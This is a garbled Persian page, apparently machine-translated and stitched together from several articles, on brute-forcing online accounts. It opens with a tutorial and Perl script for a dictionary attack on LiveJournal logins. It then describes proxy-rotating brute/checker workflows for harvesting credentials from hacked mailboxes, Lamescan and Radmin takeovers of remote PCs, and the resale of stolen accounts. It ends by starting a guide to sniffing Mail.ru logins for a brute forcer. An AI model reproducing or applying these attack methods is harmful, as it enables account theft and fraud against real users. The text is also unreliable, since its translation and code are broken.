خانه - پنجره ها
بازیابی رمز عبور Brute Force. حساب بروت فورس چیست؟ تفاوت بین بروت و چکر چیست؟

همه می دانند که این اواخر اوضاع چگونه شده است
منبع محبوب livejournal.com یا به سادگی LiveJournal است.
ایجاد حساب کاربری در این سیستم به دور از سادگی است.
فقط یا باید برای کلید پول پرداخت کنید یا
آن را از دوستان خود در LiveJournal بپرسید.

ضرب المثل معروفی هست: than
التماس و تحقیر خود بهتر است<вырезано
سانسور> و سکوت کن :). بنابراین، امروز ما
ما نیروی brute می نویسیم که آسان است
دست برخی از LiveJournal آمریکایی را خواهد شکست
چرندیات :). البته شما باید انتخاب کنید
قربانی که بعد از آن چند پیام فرستاد
ثبت نام، و سپس در آب ناپدید شد، و سپس
همین الان در لایو ژورنال گذاشتم. چنین
حساب‌های زیادی وجود دارد و می‌توان بدون آن‌ها را پیدا کرد
چالش ها و مسائل.

بنابراین، بیایید به ایده خود بازگردیم. اول ما
باید بدانید که چگونه وارد شوید
سیستم. با رفتن به www.livejournal.com/login.bml خواهیم دید
در گوشه سمت راست بالا یک فرم کوچک برای وجود دارد
وارد شدن نه، من در مورد بزرگ این وسط قضاوت نمی کنم
صفحه نمایش بعد از مشاهده کد html که انتخاب کردم
کم اهمیت. واقعیت این است که در این شکل همه چیز
دو پارامتر، برخلاف پارامتر کامل. ما
نیروی بی رحمانه آینده حداقل باید منتقل شود
بنابراین داده ها برای بازدهی بالا
بیایید روی این قالب تمرکز کنیم.

فرم دارای دو پارامتر کاربر و رمز عبور است. خودم
اسکریپت می تواند اختیاری شود
پارامتر mode که مقدار آن "login" است.
ظاهراً هنگام عبور کاربر و رمز عبور، سیستم
دلالت بر مجوز دارد. بی حوصله
با تایپ لینک http://www.livejournal.com/login.bml?user=fuck&password=fucked در مرورگر خود
(البته همه اسامی برای اهداف تغییر کرده اند
توطئه :))، من یک چرخش دریافت کردم.
این سیستم فقط برای روش POST طراحی شده است.
اما من یک فرد پیگیر هستم و حتی نتوانستم مقاومت کنم
این حفاظت:].

مرحله بعدی بازیابی حافظه بود
در مورد عملکرد روش POST. برای او
انتقال الزامات اجباری زیر مرتبط است
پارامترهای سرور:

پست
میزبان
طول محتوا

در واقع یک پست :)

تقریباً طرح یک درخواست برای
سرور، موارد زیر را دریافت کردم:

POST /login.bml HTTP/1.1
میزبان: www.livejournal.com
نوع محتوا: برنامه کاربردی/x-www-form-urlencoded
طول محتوا: 26

کاربر = فاک و رمز عبور = لعنت شده

به اندازه کافی عجیب، کار نکرد :). سیستم
لعنت به رمز اشتباه فکر کردم،
یک بررسی برای Referer و UserAgent وجود دارد، اما من اشتباه کردم.
هنگام جایگزینی پارامترهای جعلی
سرور نیز پاسخ را برگرداند - رمز عبور اشتباه است. چگونه
معلوم شد اگر آن را بعد از رمز عبور قرار دهید
علامت & طول خط را افزایش دهید
یک، سپس سرور با موفقیت داده ها را خورد و
بازگشت وارد شده است.

من واقعاً نمی خواستم همه چیز را از بین ببرم
خط HTML را طولانی کرده و یک خط از آن برش دهید
وارد شده است. می خواستم خودم را به یک ریکاوری متوسط ​​محدود کنم
یک کیلوبایت داده :). ممکن بود
از آنجایی که سرور کوکی ها را در خطوط سرصفحه قرار می دهد.
اگر پاسخ موفقیت آمیز بود، این کوکی ها وجود داشت
نام کاربری و رمز عبور رمزگذاری شده،
تقریباً در این قالب:

Set-Cookie: ljsession=ws:fuck:1:fDjwfWdsC; مسیر=/; HttpOnly

هیچ چیز ما را از بررسی اینکه آیا هدر حاوی است یا خیر منع نمی کرد
نام کاربری و اگر وجود دارد، توقف کنید
brute force و در اکانت لاگ بنویسید.

در تئوری، brute force نوشته شده بود. ترک کرد
این موضوع را عملی کند. من
من از پرل برای کدنویسی استفاده کردم چون آن را می دانم
این زبان در حال حاضر در سال سوم خود است و کاملا مناسب است
برای ایده های من با جستجو در پیچ من
قالب brute force، من یک MIME brute force برای حساب های httpd پیدا کردم،
که یک بار در این سایت توضیح دادم :).
کمی تغییرش دادم کامل گرفتم
LiveJournal brute force. تنها ایرادش
تک رشته ای است، اما برای این
یک کدنویس باحال مثل شما، فکر نمی کنم این اتفاق بیفتد
مشکل بزرگ :). برای شما باقی می ماند
اجرای چند رشته ای یا
از نسخه آزمایشی من استفاده کنید ؛).

بنابراین، کد واقعی:

#!/usr/bin/perl
از IO::Socket استفاده کنید. ##استفاده از سوکت
$|++; ## افزایش
بافر کردن

$server="www.livejournal.com"; ##
تنظیم کردیم
سرور
$port="80"; ## و
بندر :)

$logfile="cracked.log"; ##
اینجا
نوشتن اکانت هک شده

$words="bigdict.txt"; ## ما
یک فرهنگ لغت بزرگ که راهنمایی می کند
نیروی بی رحم

$user="fuck"; ## کاربر،
که ما آن را می شکنیم

$dir="/login.bml"; ## اسکریپت،
که وضعیت را برمی گرداند

open(file, "$words") یا die print "$!\n";
@data= ;
$total=@data;
بستن فایل؛ ##
بیا باز کنیم
فرهنگ لغت، همه کلمات را در یک آرایه بنویسید

foreach $pass (@data) (##
چرخه توسط
هر کلمه

$i++;
chomp($pass);
$socket=IO::Socket::INET->جدید(PeerAddr =>$server,
PeerPort => $port،
پروتو => tcp)
یا چاپ "عدم اتصال به $server:$port\n"; ##

یک اتصال به livejournal.com ایجاد کنید

$socket->autoflush(1); ##

بافر را قطع می کنیم (در صورت لزوم، زیرا...
به دلیل پیش فرض قطع شده است)

$post="user=$user&password=$pass&"; ##

تشکیل یک درخواست POST

$len=length($post);
$len+=1; ##
پیدا کردن طول
پرس و جو (عبارت + \r\n)

چاپ $socket "POST $dir HTTP/1.1\r\n";
چاپ $socket "میزبان: www.livejournal.com\r\n";;
چاپ $socket "Content-Type: application/x-www-form-urlencoded\r\n";
چاپ $socket "اتصال: بستن\r\n";
چاپ $socket "Content-Length: $len\r\n";
چاپ $socket "\r\n$post\r\n";

## ارسال به سوکت
هدر بلند

$socket->recv($answer,1024); ## و
بازگشت خواندن = 1 کیلوبایت داده

اگر ($answer=~/\:$user\:/) (
open(logf, ">>$logfile") یا die print "$!\n";
print logf "$user:$pass خوب است!!!\n";
بستن logf;
چاپ "$user:$pass خوب است!!!\n";
خروج 0; ## اگر حاوی باشد
خطی مانند:user: - یک گزارش بنویسید و گزارش را تکمیل کنید.

} ## در غیر این صورت بیایید بررسی کنیم
رمز بعدی

}

این در واقع کل نیروی بی رحم است. تایید شده است
برای من شخصاً مانند یک طلسم عمل می کند :). اما حساب ها
من آن را به شما نمی دهم تا بررسی کنید - من حریص هستم ؛)، تستی
به تنهایی همانطور که می بینید، اجرای همه چیز آسان است،
اگر فقط می خواهید

Brute force (برگرفته از عبارت انگلیسی: brute force) نوعی حمله هکری است - روشی برای هک کردن حساب ها در سیستم های رایانه ای، خدمات پرداخت/بانکی و وب سایت ها از طریق انتخاب خودکار ترکیب رمز عبور و ورود.

نیروی بی رحم بر اساس روش ریاضی به همین نام (نیروی بی رحم) است که در آن راه حل صحیح - یک عدد محدود یا ترکیب نمادین - با جستجو در گزینه های مختلف پیدا می شود. در واقع، هر مقدار از مجموعه ای از پاسخ های بالقوه (راه حل ها) از نظر صحت بررسی می شود.

نیروی بی رحم چگونه کار می کند

یک هکر یک برنامه ویژه برای حدس زدن رمزهای عبور می نویسد یا از راه حل آماده همکاران خود استفاده می کند. می توان آن را در یک سرویس ایمیل خاص، وب سایت، شبکه اجتماعی هدف قرار داد (یعنی برای هک یک منبع خاص در نظر گرفته شده است). بعد، آماده سازی برای هک انجام می شود. از مراحل زیر تشکیل شده است:

  1. تهیه لیست پروکسی

به منظور پنهان کردن آدرس IP واقعی رایانه ای که حمله از آن انجام می شود و برای جلوگیری از مسدود شدن سایتی که حساب باید در آن هک شود، اتصال اینترنت از طریق یک سرور پروکسی پیکربندی می شود.

جستجوی آدرس‌ها/پورت‌های پراکسی در Proxy Grabber انجام می‌شود. این ابزار به طور مستقل تمام داده ها را برای اتصال به سرورهای واسطه از سایت هایی که پراکسی ها را ارائه می دهند (آنها در لیست مشخص شده اند) بازیابی می کند. به عبارت دیگر، یک پروکسی جمع آوری می شود.

پایگاه داده به دست آمده در یک فایل متنی جداگانه ذخیره می شود. و سپس تمام آدرس های سرور موجود در آن برای عملکرد در جستجوگر پروکسی بررسی می شوند. اغلب، برنامه‌هایی که برای استخراج خودکار پروکسی طراحی شده‌اند، عملکردهای یک گربر و هم یک چک‌کننده را با هم ترکیب می‌کنند.

در نتیجه، یک لیست پروکسی آماده به شکل لیستی از IP/port دریافت می کنید که در یک فایل txt ذخیره شده است. (هنگام تنظیم برنامه brute force به آن نیاز خواهید داشت).

  1. جستجوی پایه برای Brute

شما باید یک فرهنگ لغت را به brute force متصل کنید - مجموعه خاصی از ترکیب رمزهای عبور و لاگین - که در فرم ورود جایگزین می شود. مانند لیست پراکسی، شکل یک لیست در یک فایل متنی معمولی (txt.) دارد. دیکشنری ها که به عنوان پایگاه داده نیز شناخته می شوند، از طریق انجمن های هکرها، وب سایت ها و خدمات میزبانی فایل توزیع می شوند. "صنعتگران" با تجربه تر آنها را به تنهایی ایجاد می کنند و آنها را با هزینه در اختیار همه قرار می دهند. هرچه پایگاه (تعداد ترکیب ها، ورود به سیستم، حساب ها) بزرگتر باشد، بهتر است (برای هکر) - احتمال موفقیت هک بیشتر است.

  1. راه اندازی brute force

لیست پروکسی بارگیری می شود. برنامه انتخاب به طور خودکار پروکسی را تغییر می دهد تا وب سرور حمله و بر این اساس منبع (میزبان) حمله را تشخیص ندهد.

یک فرهنگ لغت از ترکیب رمز عبور/ورود به سیستم متصل است. تعداد نخ ها تنظیم شده است - چند ترکیب به طور همزمان بررسی خواهد شد. یک رایانه قدرتمند با سرعت اینترنت بالا می تواند با اطمینان 120-200 جریان را مدیریت کند (این مقدار بهینه است). سرعت بروت مستقیماً به این تنظیم بستگی دارد. به عنوان مثال، اگر فقط 10 رشته تنظیم کنید، انتخاب بسیار کند خواهد بود.

  1. دویدن بی رحمانه

این برنامه تلاش های موفقیت آمیز هک را ثبت می کند: حساب های مرتبط (رمز عبور / ورود به سیستم) را در یک فایل ذخیره می کند. مدت زمان انتخاب از چند ساعت تا چند روز متغیر است. با این حال، به دلیل قدرت رمزنگاری بالای داده های ورود یا اجرای سایر اقدامات حفاظتی توسط مهاجم، همیشه موثر نیست.

انواع نیروی بی رحم

هک شخصی

شکار یک حساب خاص - در یک شبکه اجتماعی، در یک سرویس ایمیل و غیره. از طریق یا در فرآیند ارتباط مجازی، مهاجم از قربانی یک لاگین برای دسترسی به یک وب سایت استخراج می کند. سپس با استفاده از روش های brute force رمز عبور را می شکند: از brute force برای نشان دادن آدرس منبع وب و ورود به سیستم به دست آمده استفاده می کند و فرهنگ لغت را متصل می کند.

شانس چنین هکی برای مثال در مقایسه با همان حمله XSS اندک است. اگر صاحب حساب از رمز عبور 6-7 کاراکتری با یک ترکیب نماد ساده استفاده کند، می تواند موفقیت آمیز باشد. در غیر این صورت، "حل" انواع پایدارتر از 12، 15، 20 حرف، اعداد و کاراکترهای خاص، بر اساس محاسبات فرمول جستجوی ریاضی، سال ها - ده ها و صدها سال طول می کشد.

بروت / چک

یک پایگاه داده با ورود به سیستم/رمزهای عبور از صندوق‌های پستی یک سرویس پستی (به عنوان مثال، mail.ru) یا سرویس‌های مختلف به brute force متصل است. و یک لیست پروکسی - برای پوشاندن گره (زیرا سرویس های وب ایمیل به سرعت یک حمله را بر اساس درخواست های متعدد از یک آدرس IP شناسایی می کنند).

گزینه های brute فهرستی از کلمات کلیدی (معمولاً نام سایت ها) را نشان می دهد - نشانه هایی که توسط آنها اطلاعات ورود به سیستم را در صندوق های پستی هک شده جستجو می کند (به عنوان مثال: steampowered، worldoftanks، 4game، VK). یا یک منبع اینترنتی خاص.

هنگام ثبت نام در یک بازی آنلاین، شبکه اجتماعی یا انجمن، کاربر همانطور که انتظار می رود ایمیل (صندوق پستی) خود را نشان می دهد. وب سرویس یک پیام به آدرس مشخص شده با اطلاعات ورود و یک لینک برای تایید ثبت نام ارسال می کند. همان حروفی هستند که brute force به دنبال آن است تا لاگین و رمز عبور را از آنها استخراج کند.

روی "START" کلیک کنید و برنامه کرک کردن به شدت شروع می شود. طبق الگوریتم زیر عمل می کند:

  1. ورود به سیستم/رمز عبور ایمیل را از پایگاه داده بارگیری می کند.
  2. دسترسی را بررسی می‌کند، یا «چک می‌کند» (به‌طور خودکار وارد حساب می‌شود): اگر امکان ورود به حساب وجود داشته باشد، یکی را در ستون خوب اضافه می‌کند (این بدان معناست که ایمیل کاری دیگری پیدا شده است) و شروع به مشاهده آن می‌کند (نکات زیر را ببینید). ) اگر دسترسی وجود نداشته باشد، به عنوان بد فهرست می شود.
  3. در تمام «بیپ‌ها» (ایمیل‌های باز)، brute force حروف را طبق درخواست مشخص‌شده توسط هکر اسکن می‌کند - یعنی به دنبال ورود به سیستم/رمز ورود به سایت‌ها و سیستم‌های پرداخت مشخص می‌گردد.
  4. هنگامی که داده های مورد نیاز پیدا شد، آن را کپی کرده و در یک فایل جداگانه می نویسد.

بنابراین، یک "ربایش" عظیم از حساب ها رخ می دهد - از ده ها تا صدها. مهاجم "غنائم" به دست آمده را به صلاحدید خود دفع می کند - فروش، مبادله، جمع آوری داده ها، سرقت پول.

هک کامپیوتر از راه دور

نیروی بی رحم، همراه با سایر ابزارهای هکری، برای دسترسی از راه دور به رایانه شخصی قربانی محافظت شده با رمز عبور از طریق یک کانال اینترنتی استفاده می شود.

این نوع حمله شامل مراحل زیر است:

  1. جستجو برای شبکه های IP انجام می شود که در آنها حمله به رایانه های کاربر انجام می شود. محدوده آدرس از پایگاه داده های خاص یا از طریق برنامه های خاص مانند IP Geo گرفته می شود. در آن می توانید شبکه های IP را برای یک منطقه، منطقه و حتی شهر خاص انتخاب کنید.
  2. محدوده IP انتخاب شده و فرهنگ لغت انتخاب در تنظیمات Lamescan brute force (یا آنالوگ آن)، که برای ورود/گذرواژه از راه دور brute force در نظر گرفته شده است، تنظیم می شود. پس از راه اندازی، Lamescan کارهای زیر را انجام می دهد:
  • از یک محدوده معین به هر IP ارتباط برقرار می کند.
  • پس از ایجاد اتصال، سعی می کند از طریق پورت 4899 به هاست (PC) متصل شود (اما ممکن است گزینه های دیگری وجود داشته باشد).
  • اگر پورت باز است: سعی می کند به سیستم دسترسی پیدا کند، هنگامی که از شما رمز عبور خواسته می شود، حدس زدن را انجام می دهد. در صورت موفقیت آمیز بودن، آدرس IP میزبان (رایانه) و اطلاعات ورود به سیستم را در پایگاه داده خود ذخیره می کند.

  1. هکر ابزار Radmin را راه اندازی می کند که برای مدیریت رایانه های شخصی از راه دور طراحی شده است. مختصات شبکه قربانی (IP، ورود به سیستم و رمز عبور) را تنظیم می کند و کنترل کامل سیستم را به دست می آورد - دسکتاپ (به صورت بصری در صفحه نمایش رایانه مهاجم نمایش داده می شود)، فهرست فایل ها، تنظیمات.

برنامه هایی برای Brutus

نیروی بی رحم کلاسیک، یکی از اولین ها. با این حال، ارتباط خود را از دست نمی دهد و با راه حل های جدید رقابت می کند. این یک الگوریتم brute force سریع دارد و از تمام پروتکل های اصلی اینترنت - TCP/IP، POP3، HTTP و غیره پشتیبانی می کند. می تواند کوکی ها را جعل کند. دیکشنری را بی‌رحمانه می‌کند و رمزهای عبور را مستقل تولید می‌کند.

بروت چکر قدرتمند مجهز به زرادخانه گسترده ای از توابع برای کار با پایگاه های داده (بررسی، مرتب سازی بر اساس دامنه). از انواع مختلف پروکسی ها پشتیبانی می کند و عملکرد آنها را بررسی می کند. حروف را در صندوق های پستی بر اساس تنظیماتی مانند تاریخ، کلمه کلیدی، آدرس، پیام های خوانده نشده اسکن می کند. می توانید نامه ها را از Mail.ru و Yandex بارگیری کنید.

قفل رمز عبور Appnimi

برنامه ای برای اجباری رمز عبور برای یک فایل در رایانه محلی. نوعی اسب کار نسخه رایگان این برنامه به شما امکان می دهد رمزهای عبور بیش از 5 کاراکتر را انتخاب کنید. می توانید در مورد نحوه نصب و استفاده از Appnimi Password Unlocker بخوانید



در بازی ها، شبکه های اجتماعی و ... که به صورت غیرقانونی یعنی هک یا دزدیده شده اند. البته درک اینکه بروت چیست و چگونه کار می کند بسیار دشوار است، اما ما سعی خواهیم کرد این کار را انجام دهیم. اما ابتدا بیایید بفهمیم که چگونه از تبدیل شدن به قربانی بعدی مهاجمان جلوگیری کنیم.

زور وحشیانه چیست و چگونه از خود در برابر آن محافظت کنیم

بنابراین نرم افزار خاصی وجود دارد که به شما این امکان را می دهد تا با انتخاب ترکیبی از اعداد و حروف، رمزهای عبور صحیح را برای لاگین های موجود، ایمیل ها و ... پیدا کنید.البته یکسری امکانات در عملکرد این گونه برنامه ها وجود دارد. برای مثال، هر چه رمز عبور طولانی‌تر و پیچیده‌تر باشد، شکستن آن بیشتر طول می‌کشد و همه چیز می‌تواند به جایی برسد که نیروی brute force از کار بیفتد. در مورد زمان، مقدار زیادی به قدرت محاسباتی تجهیزات و اتصال به اینترنت بستگی دارد. بنابراین، این فرآیند می تواند از چند دقیقه طول بکشد و تا یک روز یا بیشتر طول بکشد.

احتمالاً قبلاً متوجه شده اید که نیروی اکانت بروت فورس چیست. در مورد امنیت، همانطور که در بالا ذکر شد، توصیه می شود رمز عبوری تنظیم کنید که به خاطر سپردن آن برای خودتان دشوار است. به عنوان مثال، RKGJH4hKn2. به جرات می توان گفت که هک کردن آن بسیار مشکل ساز خواهد بود. علاوه بر این، باید به خاطر داشته باشید که برای مثال، بسیاری از حروف یکسان، مانند اعداد، هیچ تاثیری ندارند. همه چیز باید گیج و مخلوط شود، توصیه می شود حروف بزرگ و کوچک را جایگزین کنید.

بیس Brute چیست؟

البته اگر دیتا نباشد برنامه کار نخواهد کرد. بنابراین، اگر او چیزی برای حدس زدن رمزهای عبور نداشته باشد، این کار را انجام نخواهد داد. پایگاه داده مجموعه ای از رمزهای عبور و ورود به سیستم است. هرچه این لیست گسترده تر باشد، احتمال هک شدن حساب بیشتر می شود. خیلی بستگی به این دارد که چه ترکیباتی در آن وجود دارد، یعنی هر چه با صلاحیت تر ترکیب شود، بهتر است. همچنین شایان ذکر است که پایگاه داده نه تنها شامل رمزهای عبور، بلکه لاگین نیز می شود، زیرا brute force که در زبان انگلیسی به معنای "نیروی بی رحم" است، می تواند هر دو را به طور همزمان انتخاب کند.

شایان ذکر است که خود فایلی که تمام رکوردها در آن ذخیره می شود بسیار بزرگ است. حداقل طول ترکیب 3 حرف و عدد و حداکثر 8-16 بسته به برنامه و نسخه آن است. انتخاب با حرف "A" شروع می شود و با آخرین حرف الفبای انگلیسی یا روسی پایان می یابد. این اساساً تمام اطلاعات موجود در پایگاه های داده است که ممکن است برای شما مفید باشد.

چه کسی و چرا به این نیاز دارد؟

پاسخ دادن به این سوال بدون ابهام دشوار است. افراد به دلایل زیادی سعی در هک کردن حساب ها دارند. این می تواند فقط برای سرگرمی، میل به خواندن نامه های دیگران، ارسال پیام های نامعتبر و غیره باشد. مسئله این است که این غیرقانونی است. علاوه بر این، می توان آن را یک سرقت واقعی دانست و باید پاسخگوی آن باشید. انجام چنین کارهایی اکیداً توصیه نمی شود، به خصوص که گاهی اوقات باعث اتلاف وقت می شود.

حتی اگر حساب شما هک شده باشد، می توان آن را به سرعت و به راحتی بازیابی کرد. اگر هنگام ثبت نام داده های واقعی ارائه کرده باشید، انجام این کار به ویژه آسان است. در مورد حساب هایی که با عجله ایجاد شده اند، بازگرداندن آنها بسیار دشوارتر خواهد بود. اما، همانطور که تمرین نشان می دهد، چنین حساب هایی توسط هکرها ارزش گذاری نمی شوند. برداشتن حساب یا نامه شخصی که هیچ فایده ای ندارد فایده ای ندارد و نیازی به صحبت مجدد در مورد آن نیست.

چه کسی زور می کند؟

اگر بگوییم که این کار توسط به اصطلاح هکرها انجام می شود، اضافی نیست. این در مورد هک های مقیاس بزرگ صدق می کند. به طور کلی، چنین افرادی از این راه امرار معاش می کنند و این کار را بسیار ماهرانه انجام می دهند. و این طرح به شرح زیر عمل می کند. با استفاده از brute force، لاگین و رمز عبور (تعداد مشخص) انتخاب می شود و سپس کل کالا به صورت عمده به مشتریان فروخته می شود. یعنی خود هکرها عملاً از آنچه به صورت غیرقانونی به دست آورده اند استفاده نمی کنند، بلکه صرفاً آن را می فروشند. اما شما بپرسید خریدار کیست؟

این می تواند هر کسی باشد. تنها چیزی که می توان گفت این است که آنها مشغول خرید تعداد زیادی حساب هستند. این حساب‌ها سپس به کاربران عادی فروخته می‌شوند که از بازگشت به مالک اصلی خود متعجب می‌شوند. همین امر در مورد داده های شخصی سیستم های پرداخت (Webmoney، Qiwi) صدق می کند. علاوه بر این واقعیت که امکان دریافت مقدار مشخصی وجوه وجود دارد، چنین حسابی می تواند فروخته شود، این امر به ویژه در مواردی که گواهی های گران قیمتی وجود دارد که صلاحیت مالک را تأیید می کند، صادق است.

کمی در مورد سرورهای پروکسی برای نیروی بی رحم

هر هکری که به خود احترام می گذارد اول از همه به این فکر می کند که چگونه از خود محافظت کند. و از آنجایی که کاری که او انجام می دهد کاملاً غیرقانونی است، باید توجه ویژه ای به این امر شود. ما قبلاً می دانیم که نیروی بی رحم چیست و اکنون می خواهم به شما بگویم که یک سرور پراکسی چگونه کار می کند. این به شما این امکان را می دهد که در طول هک حساب کاربری شناسایی نشوید. به عبارت ساده، آدرس IP ناشناخته باقی می ماند. این محافظ اصلی برای افرادی است که اکانت دیگران را هک می کنند.

اما این همه ماجرا نیست. پس از هک شدن حساب کاربری، باید وارد آن شوید. اما حتی با نام کاربری و رمز عبور صحیح، گاهی اوقات انجام این کار آسان نیست. به عنوان مثال، تغییر آدرس IP مستلزم ارسال یک کد امنیتی به ایمیل یا تلفن شما است؛ چنین سیستمی با موفقیت توسط Valve به ویژه برای محافظت از محصول خود به نام Steam استفاده می شود. البته برای بروتوس از قبل مشخص شده است. بنابراین، ما می توانیم وارد هر حساب کاربری شویم و به هیچ وجه شبهه ای ایجاد نکنیم، که جرم را کامل می کند.

نیازی نیست یک بار دیگر تکرار کنید که رمز عبور باید طولانی و پیچیده باشد. همچنین استفاده از حساب کاربری خود در مکان های شلوغ یا محل کار، جایی که هر کسی می تواند از رایانه یا لپ تاپ استفاده کند، توصیه نمی شود. در مرحله اول، می توان از یک برنامه جاسوسی ویژه استفاده کرد که به یاد می آورد کدام کلیدها فشرده شده اند؛ همانطور که می دانید، تشخیص رمز عبور دشوار نخواهد بود.

اما این تمام چیزی نیست که باید بدانید. توصیه می شود رمز عبور را در مرورگر به خاطر بسپارید، زیرا ممکن است رهگیری شود. حساب‌هایی وجود دارند که با ورود به سیستم، بلافاصله پیامکی با کد تأیید در تلفن همراه خود دریافت می‌کنید. بنابراین، اگر وارد شد و کاری با آن ندارید، پسورد را تغییر دهید و توصیه می شود در اسرع وقت اقدام کنید.

تفاوت بین بروت و چکر چیست؟

بنابراین، بیایید اکنون بفهمیم که تفاوت بین این دو مفهوم چیست. بنابراین، ما قبلاً تصمیم گرفته‌ایم که brute force به شما امکان می‌دهد با جستجوی ساده از دیکشنری (پایه) یک ورود و رمز عبور را انتخاب کنید. بیایید نمونه ای از هک کردن یک سرویس ایمیل را بررسی کنیم. به عنوان مثال، ما دسترسی پیدا کرده ایم، اما بعد چه باید کرد؟ به عنوان یک قاعده، ما به اطلاعات مربوط به حساب‌های موجود در شبکه‌های اجتماعی، بازی‌های آنلاین، سیستم‌های پرداخت و غیره علاقه‌مندیم. بنابراین، چک‌کننده رمز عبور ایمیلی را که از قبل برای مسابقات در اختیار داریم، بررسی می‌کند.

به عبارت ساده، اگر به عنوان مثال با نصب شده در VKontakte مطابقت داشته باشد، بلافاصله آن را تشخیص خواهیم داد. می توان نتیجه گرفت که این ما را از سردردهای غیر ضروری محروم می کند. در نتیجه، فرآیند بیشتر خودکار است و عملاً نیازی به مشارکت ما ندارد. اکنون می دانید brute و checker چیست و این برنامه ها چگونه کار می کنند.

نتیجه

با توجه به مطالب گفته شده می توان به نتایج خاصی دست یافت. این حساب فقط باید در رایانه شخصی استفاده شود، زمانی که دسترسی افراد غیرمجاز منتفی باشد. همین امر در مورد اتصالات به وای فای رایگان نیز صدق می کند، زیرا احتمال رهگیری جریان داده و دزدیده شدن بعدی حساب شما وجود دارد. از آنجایی که قبلاً می دانید، Brute، دفاع از خود برای شما بسیار آسان تر خواهد بود. همانطور که می گویند، کسی که آگاه است، ساعد است. به یاد داشته باشید که میزان محافظت از حساب شما فقط به شما بستگی دارد. اگر همه چیز را به درستی انجام دادید، دیگر نیازی به نگرانی نیست، و بعید است که نیاز داشته باشید که بدانید حساب brute force چیست و تفاوت های ظریف نحوه عملکرد برنامه چیست.

سلام به همه! بالاخره وقت کردم یک مقاله طولانی بنویسم.

در آن من به شما نشان خواهم داد که چگونه BruteForce (محاوره ای "brut") بنویسید.

1) کمی تاریخچه

در ابتدای سال شروع به جستجوی اطلاعاتی در مورد نوشتن brute force در اینترنت کردم.

خیلی کم بود، حتی مجبور شدم چیزی از اسپانیایی ترجمه کنم =)).

اما من تسلیم نشدم و به جستجوی خود ادامه دادم و دو ماه پیش همه چیز را فهمیدم و یک بروت فورس ساده تک رشته ای نوشتم. اما از "غول هایی" مانند "Brutus AET2" دور بود. من شروع به جستجوی اطلاعات در مورد چند رشته ای کردم و جستجوی من با موفقیت همراه بود. در حال حاضر تمام اطلاعات جمع آوری شده است و من این مقاله را می نویسم تا کسانی که تصمیم به نوشتن یک نیروی بی رحم دارند مجبور نباشند در گوشه و کنار شبکه بخزند و اطلاعات جمع آوری کنند.

2) تئوری

در داستان قبلی ام بیش از یک بار کلمه brute force را ذکر کردم. چیست؟

من با یک مثال به شما نشان خواهم داد: فرض کنید رمز عبور ایمیل خود را فراموش کرده اید (به هر حال، اغلب این اتفاق می افتد).

می‌توانید از طریق یک سؤال امنیتی یا تلفن همراه رمز عبور خود را بازیابی کنید، اما اگر تلفن همراه ندارید و سؤال امنیتی می‌گوید "چند دندان روی پنجه راست گربه من وجود دارد؟"

آن وقت چه باید کرد؟ درست است، سعی کنید رمز عبور را حدس بزنید. اما چطور؟؟؟ دستی؟؟ البته نه، این همان چیزی است که brute force برای این ایجاد شده است، تا نیروی بی رحم را برای شما انجام دهد.

اصل کار ساده است: ما ایمیل خود را نشان می دهیم و لیستی از رمزهای عبور را وصل می کنیم. روی Start کلیک کنید و به کسب و کار خود ادامه دهید. وقتی رمز عبور صحیح پیدا شد، brute force آن را روی صفحه نمایش می دهد.

همه چیز خوب خواهد بود، اما اگر یک میلیون رمز عبور در فرهنگ لغت خود داشته باشیم چه؟ Brutus یک میلیون درخواست به سرور ارسال می کند و سرور فکر می کند که ما در حال هک کردن صندوق پستی شخص دیگری هستیم و به سادگی آدرس IP ما را مسدود می کند. پس چطور؟

برای این منظور سرورهای پروکسی ارائه شده است. من به شما نمی گویم که چیست، زیرا موضوع بسیار گسترده ای است. می توانید در مورد پروکسی ها بخوانید. به طور خلاصه: پروکسی ها آی پی ما را تغییر می دهند و جستجو ادامه می یابد.

آخرین نکته تئوری حالت های جستجو است.

تنها دو مورد از آنها وجود دارد: تک رشته ای و چند رشته ای.

در حالت تک رشته ای، brute force اولین رمز عبور را می گیرد و منتظر پاسخ سرور می ماند. وقتی پاسخ دریافت شد رمز بعدی و غیره را می گیرد.

در حالت چند رشته ای، brute force رشته های زیادی ایجاد می کند. در هر یک از آنها، brute force رخ می دهد، یعنی brute force نیازی به منتظر ماندن برای پاسخ از طرف سرور برای ادامه ندارد. به سادگی موضوع بعدی را ایجاد می کند و جستجو ادامه می یابد.

مثال: شما تصمیم می گیرید یک فیلم را از طریق تورنت دانلود کنید. شما یک فایل تورنت پیدا کردید و شروع به دانلود کردید. در حالی که دانلود در حال انجام است، به عنوان مثال، شما به Contact رفتید و با دوستان مکاتبه کردید. در یک تاپیک مرورگر در حال اجرا است، در دیگری تورنت با پشتکار یک فیلم را دانلود می کند و در سومین تاپیک آنتی ویروس در حال اسکن سیستم و غیره است.

امیدوارم واضح توضیح داده باشم

2) تمرین طولانی مدت

در حالی که در حال نوشتن یک بروت فورس ساده تک رشته ای هستیم (برای اینکه به مغزمان اضافه نشود) و در قسمت دوم در مورد ایجاد بروت فورس چند رشته ای و تغییر صحبت خواهم کرد.

proxy + من بخش هایی از کد را ارائه می کنم که می توانید در پروژه های خود استفاده کنید.

بنابراین! برو

VB.NET را باز کنید، یک پروژه معمولی ایجاد کنید و چیزی شبیه به این بسازید:

اکنون باید در مورد سرور تصمیم گیری کنیم و درخواست ها را "بوی" کنیم.

من با استفاده از Mail.ru به عنوان مثال به شما نشان خواهم داد:

با استفاده از آن، خواهیم دید که چگونه مجوز روی سرور رخ می دهد.

2) نسخه Stand-Alone برنامه را اجرا کنید: 3

3) به ایمیل Mail.ru بروید و داده ها را وارد کنید، اما هنوز وارد سیستم نشوید:

4) در HttpAnalyzer، روی مکث کلیک کنید.

به Mail Mail برمی گردیم و روی ورود کلیک می کنیم.

حالا برگردیم به اسنیفر. موارد زیر را رعایت می کنیم:

درخواست POST برای اسکریپت مجوز با رنگ آبی مشخص شده است.

بیایید ببینیم چه داده هایی ارسال می شود:

ورود - ورود

دامنه - دامنه

رمز عبور - رمز عبور

Saveauth - آیا باید داده های خود را ذخیره کنیم (دقیقا مطمئن نیستم)

من نمی توانم در مورد آخرین پارامتر چیزی بگویم، اما ما به آن نیاز نداریم :n =)

بیایید سعی کنیم یک درخواست ارسال کنیم:

اگر همه چیز به درستی وارد شده باشد، به ایمیل خود خواهید رسید.

در غیر این صورت یک پیغام خطای ورود مشاهده خواهید کرد.

برای این کار به تب Cookies بروید. ما به سمت راست علاقه مندیم:

می بینیم که دو کوکی ایجاد می شود: Mpop و t.

"Set - Cookie" - فیلد هدر به سرور ارسال شد.

